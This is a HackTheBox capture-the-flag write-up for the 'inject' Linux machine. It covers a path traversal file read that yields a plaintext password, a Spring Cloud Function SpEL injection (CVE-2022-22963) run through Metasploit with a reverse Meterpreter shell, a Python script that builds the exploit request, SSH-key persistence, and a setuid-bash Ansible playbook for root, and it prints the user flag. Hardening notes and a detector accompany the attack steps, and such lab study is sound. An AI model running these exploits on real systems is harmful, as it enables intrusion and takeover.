HTB: inject Writeup

Machine Banner

Machine Information

Attribute       Details
Name            inject
OS              Linux
Difficulty      Easy
Points          N/A
Release Date    N/A
IP Address      10.129.228.213
Author          D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐☆☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

inject is an Easy-difficulty Linux machine featuring a Spring Boot web application with multiple vulnerabilities. The exploitation path starts with a path-traversal file read (referred to as LFI in this writeup) in the image display endpoint, which is used to pull credentials out of a Maven settings file and to identify Spring Cloud Function in the application's pom.xml. A Spring Expression Language (SpEL) injection in Spring Cloud Function then gives Remote Code Execution (RCE), the extracted credentials allow lateral movement to a second user, and a modifiable Ansible playbook executed by root yields privilege escalation.

TL;DR: Path traversal read (LFI) → Credential Extraction → Spring Cloud Function SpEL RCE → Lateral Movement → Privilege Escalation via Ansible playbook.


Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.228.213

Results:

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open nagios-nsca Nagios NSCA

Service Enumeration

Hostname: inject.htb

Terminal window
echo "10.129.228.213 inject.htb" >> /etc/hosts

nmap's service match for port 8080 (Nagios NSCA) is a misidentification; browsing the port shows a Spring Boot web application. HTTP enumeration reveals the endpoints that matter:

  • /register/ - Registration endpoint
  • /upload/ - File upload functionality
  • /show_image - Serves uploaded images by file name; its img parameter is vulnerable to path traversal

A WAF (Web Application Firewall) is detected during reconnaissance.


Initial Foothold

Local File Inclusion (LFI) via Path Traversal

The /upload/ endpoint accepts image uploads and /show_image serves them back by file name. The img parameter is joined to the upload directory without normalisation or a containment check, so a leading slash followed by a run of ../ segments walks out of that directory and reads arbitrary files:

Terminal window
GET /show_image?img=/../../../../../../etc/passwd

Any file readable by the account the application runs under can be retrieved this way. The upload-side file-type restrictions are irrelevant here: nothing needs to be uploaded, the read path itself is attacker-controlled.
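The two resolvers below are an added example, not code from the writeup or from the application on the box: a naive join of the kind that produces the behaviour above, next to a hardened version that accepts only a bare file name and checks containment. The upload directory path is an assumption (the page does not state the real one); the payload builder reproduces the img value used above.

```python
import posixpath

# Assumed upload directory; the page does not state the application's real path.
UPLOAD_DIR = "/var/www/WebApp/uploads"


def traversal_payload(depth: int, target: str) -> str:
    """Build an img value like the one used above: a leading slash plus `depth` '../' segments.

    Extra '../' past the root are harmless (normalisation drops them), so over-estimating
    depth is the safe choice when the upload directory's depth is unknown.
    """
    return "/" + "../" * depth + target.lstrip("/")


def vulnerable_resolve(img: str, base: str = UPLOAD_DIR) -> str:
    """Naive 'base + img' join, as a vulnerable file-serving endpoint might do it.

    The client's '..' segments are honoured, so the result can be anywhere on disk.
    """
    return posixpath.normpath(base + "/" + img)


def hardened_resolve(img: str, base: str = UPLOAD_DIR):
    """Accept only a bare file name and confirm the joined path stays under base.

    Returns the resolved path, or None when the request must be refused.
    """
    name = posixpath.basename(img)
    if name in ("", ".", "..") or name != img:
        return None                      # a directory component was supplied: reject
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, name))
    if not candidate.startswith(base + "/"):
        return None                      # containment check, kept as defence in depth
    return candidate


if __name__ == "__main__":
    payload = traversal_payload(6, "/etc/passwd")
    print(payload, "->", vulnerable_resolve(payload))   # traversal succeeds
    print(payload, "->", hardened_resolve(payload))     # rejected
    print("cat.png ->", hardened_resolve("cat.png"))
```

A real implementation should additionally resolve symlinks (realpath) before the containment check; that cannot be demonstrated on paths that do not exist, so it is left out here.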

Credential Extraction

Using the path traversal, the following files are retrieved:

  1. System users - /etc/passwd reveals:
    • frank (UID 1000)
    • phil (UID 1001)
    • _laurel
  2. Maven credentials - /home/frank/.m2/settings.xml contains a <server> entry with:
    Username: phil
    Password: DocPhillovestoInject123
  3. Application structure - /var/www/WebApp/pom.xml lists the Maven dependencies, including Spring Cloud Function; this is what points at the SpEL injection used next.

The fact that a file under frank's home directory is readable through the web application is an early hint about which account the application runs as.
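Parsing the two recovered files is worth automating, because the same pattern (settings.xml for credentials, pom.xml for the dependency that makes the next step possible) recurs on any Maven-built target. The script below is an added example, not the writeup's tooling; both XML documents are constructed samples modelled on the file types above, the password is a placeholder, and the spring-cloud-function version is illustrative. The affected-version ranges are those of CVE-2022-22963 (fixed in 3.1.7 and 3.2.3).

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples (NOT the files from the box): placeholder password,
# illustrative version number.
SETTINGS_XML = """<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>example-password</password>
    </server>
  </servers>
</settings>
"""

POM_XML = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <artifactId>WebApp</artifactId>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>org.springframework.cloud</groupId>
      <artifactId>spring-cloud-function-web</artifactId>
      <version>3.2.2</version>
    </dependency>
  </dependencies>
</project>
"""


def maven_server_credentials(settings_xml: str):
    """Return (id, username, password) for every <server> in a Maven settings.xml.

    The '{*}' prefix matches any namespace, so files with or without xmlns work.
    """
    root = ET.fromstring(settings_xml)
    return [
        (
            s.findtext("{*}id", default=""),
            s.findtext("{*}username", default=""),
            s.findtext("{*}password", default=""),
        )
        for s in root.findall(".//{*}server")
    ]


def maven_dependencies(pom_xml: str):
    """Map 'groupId:artifactId' -> version ('' when the version comes from a parent/BOM)."""
    root = ET.fromstring(pom_xml)
    deps = {}
    for dep in root.findall(".//{*}dependency"):
        gid = dep.findtext("{*}groupId", default="")
        aid = dep.findtext("{*}artifactId", default="")
        deps[f"{gid}:{aid}"] = dep.findtext("{*}version", default="")
    return deps


def _version_tuple(version: str):
    """'3.2.2-SNAPSHOT' -> (3, 2, 2); only the leading numeric parts matter here."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])


def spel_rce_candidates(deps):
    """List spring-cloud-function artifacts in a range affected by CVE-2022-22963.

    Affected: 3.1.6 and older (fixed in 3.1.7) and 3.2.0 to 3.2.2 (fixed in 3.2.3).
    Artifacts without an explicit version are reported for manual review.
    """
    hits = []
    for coord, version in deps.items():
        if ":spring-cloud-function" not in coord:
            continue
        if not version:
            hits.append(f"{coord} (version unknown, check parent/BOM)")
            continue
        v = _version_tuple(version)
        if v < (3, 1, 7) or (3, 2, 0) <= v < (3, 2, 3):
            hits.append(f"{coord} {version}")
    return hits


if __name__ == "__main__":
    print(maven_server_credentials(SETTINGS_XML))
    print(spel_rce_candidates(maven_dependencies(POM_XML)))
```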

Spring Cloud Function SpEL Injection (RCE)

With Spring Cloud Function identified from pom.xml, its SpEL injection (CVE-2022-22963: the function router evaluates the spring.cloud.function.routing-expression request header as a Spring Expression Language expression, so a type reference such as T(java.lang.Runtime) reaches Runtime.exec()) is exploited with the Metasploit module:

Terminal window
msfconsole
use exploit/multi/http/spring_cloud_function_spel_injection
set RHOSTS 10.129.228.213
set RPORT 8080
set TARGETURI /functionRouter
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.6
exploit

Result: a Meterpreter session is obtained. The process runs as frank, the account the Spring Boot application runs under, so the shell has frank's privileges rather than those of a www-data service account.
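To show what the Metasploit module is doing under the hood, and what a defender should look for, the block below builds the equivalent raw request and runs a header-level detector over it. This is an added example reconstructed from the mechanism of CVE-2022-22963, not the module's own code; the host, port and command are illustrative, and the detector distinguishes the legitimate use of the routing header (a plain function name) from an expression that references a type or constructor.

```python
import re

ROUTING_HEADER = "spring.cloud.function.routing-expression"


def spel_exec_expression(command: str) -> str:
    """SpEL that runs `command` through /bin/bash when the router evaluates it.

    T(...) is SpEL's type reference; the String[] form of exec() lets bash handle
    pipes and redirects. Single quotes delimit SpEL string literals and are
    escaped by doubling.
    """
    def lit(s: str) -> str:
        return "'" + s.replace("'", "''") + "'"
    argv = ",".join(lit(a) for a in ("/bin/bash", "-c", command))
    return f"T(java.lang.Runtime).getRuntime().exec(new String[]{{{argv}}})"


def build_request(host: str, port: int, command: str, path: str = "/functionRouter") -> str:
    """Raw HTTP request equivalent to the module's (reconstructed here, not its code)."""
    body = "x"   # any body will do: the routing expression is evaluated before dispatch
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        f"{ROUTING_HEADER}: {spel_exec_expression(command)}\r\n"
        f"Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


# Detection side: a legitimate routing-expression header names a function
# (e.g. "uppercase"); exploitation needs a type reference, a constructor call
# or a runtime/process API.
_SPEL_DANGER = re.compile(r"T\s*\(|new\s+[\w.]+\s*\(|getRuntime|ProcessBuilder", re.IGNORECASE)


def detect_spel_injection(raw_request: str):
    """Return the suspicious routing-expression value from a raw HTTP request, or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:            # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == ROUTING_HEADER and _SPEL_DANGER.search(value):
            return value.strip()
    return None


if __name__ == "__main__":
    req = build_request("inject.htb", 8080, "id")   # illustrative target and command
    print(req)
    print("flagged:", detect_spel_injection(req))
```

Sending this yourself (with curl or Burp Repeater) is a useful check when a module fails against a WAF: the header name is fixed by the framework, but the expression itself can be reshaped.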


User Compromise

Lateral Movement to phil

From the shell obtained above, switch to the phil user using the credentials extracted from the Maven settings:

Terminal window
su - phil
# Password: DocPhillovestoInject123

Persistence via SSH Key

Add a public SSH key to phil’s authorized_keys for persistent access:

Terminal window
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: a4b65e611fa2eb85330e79815cab9a79


Privilege Escalation

Enumeration

Terminal window
sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

After uploading linpeas for automated enumeration, the critical finding is a modifiable Ansible playbook:

Terminal window
/opt/automation/tasks/playbook_1.yml

Exploitation via Ansible Playbook

The Ansible playbook in /opt/automation/tasks/playbook_1.yml can be modified by phil. On its own that would be harmless; what makes it a privilege escalation is that the playbooks in this directory are executed by root (the scheduler itself is not shown here, but the result confirms it). A playbook task that sets the setuid bit on /bin/bash is therefore run with root privileges, and once the bit is set a setuid shell is available:

Terminal window
bash -p

With the setuid bit in place, bash -p keeps the effective UID of 0 instead of dropping privileges, giving a root shell and full system access.
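The block below is an added example of the reasoning in this step, not tooling from the writeup: a POSIX write-permission check run over constructed stat-style records for the tasks directory and the playbook, the playbook that would be dropped, and a check for the resulting setuid bit. The owner, group, mode and phil's uid/gids are assumptions (the page only says the playbook is modifiable), and the playbook relies on the assumption that a root-owned automation executes every playbook found in that directory.

```python
import stat
from collections import namedtuple

# Constructed stat-style records (NOT read from the box); the page only says the
# playbook is modifiable, so owner, group and mode are assumptions.
Entry = namedtuple("Entry", "path mode uid gid")
TASKS_DIR = Entry("/opt/automation/tasks", 0o2775, 0, 50)              # assumed root:staff, group-writable
PLAYBOOK = Entry("/opt/automation/tasks/playbook_1.yml", 0o664, 0, 50)  # assumed root:staff, group-writable

# Identity used for the check: phil's uid and supplementary gids are constructed values.
PHIL_UID, PHIL_GIDS = 1001, {1001, 50}


def can_write(entry: Entry, uid: int, gids: set) -> bool:
    """Classic POSIX owner/group/other evaluation of the write bit."""
    if uid == 0:
        return True
    if uid == entry.uid:
        return bool(entry.mode & stat.S_IWUSR)
    if entry.gid in gids:
        return bool(entry.mode & stat.S_IWGRP)
    return bool(entry.mode & stat.S_IWOTH)


def is_setuid_root(entry: Entry) -> bool:
    """True once the playbook has run: root-owned with the setuid bit set."""
    return entry.uid == 0 and bool(entry.mode & stat.S_ISUID)


# Playbook to drop into the directory. Assumption: a root-owned automation
# periodically runs every playbook found there. Ansible's file module accepts
# the setuid bit as part of 'mode'.
PRIVESC_PLAYBOOK = """\
- hosts: localhost
  tasks:
    - name: set the setuid bit on bash so `bash -p` keeps euid 0
      file:
        path: /bin/bash
        mode: '4755'
"""


def plan(uid: int = PHIL_UID, gids: set = PHIL_GIDS) -> str:
    """Decide which write is available and what to do with it."""
    if can_write(TASKS_DIR, uid, gids):
        return "drop a new playbook in the directory, wait for the run, then: bash -p"
    if can_write(PLAYBOOK, uid, gids):
        return "overwrite the existing playbook, wait for the run, then: bash -p"
    return "no write access: look elsewhere"


if __name__ == "__main__":
    print(plan())
    print(PRIVESC_PLAYBOOK)
    print("setuid after run:", is_setuid_root(Entry("/bin/bash", 0o4755, 0, 0)))
```

The same check, run the other way round, is the hardening control: no file or directory that root-driven automation consumes should be writable by a non-root user or group.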

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Port Scanning<br/>nmap discovery of ports 22, 8080"] --> B["HTTP Enumeration<br/>Discover /upload and /show_image endpoints"]
B --> C["LFI Exploitation<br/>Path traversal in /show_image endpoint"]
C --> D["Credential Extraction<br/>Read Maven settings.xml with phil credentials"]
D --> E["SpEL Injection RCE<br/>Spring Cloud Function exploitation via Metasploit"]
E --> F["Meterpreter Shell<br/>Initial access as frank, the app's user"]
F --> G["Lateral Movement<br/>su to phil using extracted credentials"]
G --> H["User Flag<br/>a4b65e611fa2eb85330e79815cab9a79"]
H --> I["Privilege Escalation<br/>Ansible playbook exploitation"]
I --> J["Root Access<br/>bash -p privilege escalation"]

Tools Used

Tool            Purpose
nmap            Port scanning and service fingerprinting (ports 22, 8080)
burp-suite      HTTP endpoint enumeration and request manipulation
metasploit      Spring Cloud Function SpEL injection exploitation
msfvenom        Meterpreter payload generation (linux/x64/meterpreter/reverse_tcp)
linpeas         Automated Linux privilege-escalation enumeration
ssh             Persistent access with the planted key
searchsploit    Exploit database search for vulnerability identification
curl/wget       File download and HTTP requests

Key Learnings

  • Path Traversal in File-Serving Endpoints: An endpoint that serves uploaded files by name must canonicalise the requested path and confirm it stays inside the intended directory. The image display endpoint's lack of such a check enabled reading arbitrary files as the application's user.
  • Credential Storage in Config Files: Maven settings.xml and similar configuration files can contain plaintext credentials that enable lateral movement. Keep them out of web-reachable locations and restrict their permissions to the owning user.
  • Framework-Specific Vulnerabilities: Spring Cloud Function's SpEL injection (CVE-2022-22963) gives unauthenticated RCE on affected versions. Understanding the technology stack, here from pom.xml, is what made the applicable exploit obvious.
  • Enumeration Leads to RCE: Thorough HTTP enumeration and the file reads it enabled provided the dependency information needed to pick the right Metasploit module.
  • Privilege Escalation via Automation: Anything that root executes on a schedule, including Ansible playbooks, must not be writable by unprivileged users; a writable playbook directory is equivalent to a root shell.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy